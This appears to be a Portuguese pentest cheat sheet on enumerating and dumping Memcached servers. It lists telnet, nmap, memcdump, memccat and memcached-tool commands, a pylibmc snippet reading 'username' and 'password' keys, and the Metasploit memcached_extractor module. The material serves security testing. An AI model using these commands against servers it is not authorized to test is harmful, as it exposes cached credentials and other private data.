Memcached
Conectando ao Memcached
Telnet / Netcat
Conectando ao MemCached
telnet <ip> 11211
Verificando a versão
version
Verificando estatísticas do servidor
stats
stats slabs
stats items
Para realizar o dump de todas as chaves, verifique o número do "item" com o comando acima (geralmente é 1) antes de executar o comando abaixo.
stats cachedump <item_number> 0
Agora que já temos os nomes dos items, podemos retornar os seus respectivos valores.
get <item_name>
python
import pylibmc
mc=pylibmc.Client(["<ip>"],username="<username>",password="<pass>",binary=True)
mc["username"]
mc["password"]
Enumando Informações
nmap
nmap --script memcached-info -p11211 <ip>
MemcStat
memcstat --servers=<ip>
memcstat --servers=<ip> --username=<user> --password=<password>
MemcDump
memcdump --servers=<ip>
MemcCat
memccat --servers=<ip> --username=<username> --password=<password> <key>
memcached-tool
memcached-tool <ip>:11211 dump
Metasploit
msfconsole -q
use auxiliary/gather/memcached_extractor
set RHOSTS <ip>
exploit
Last updated
Was this helpful?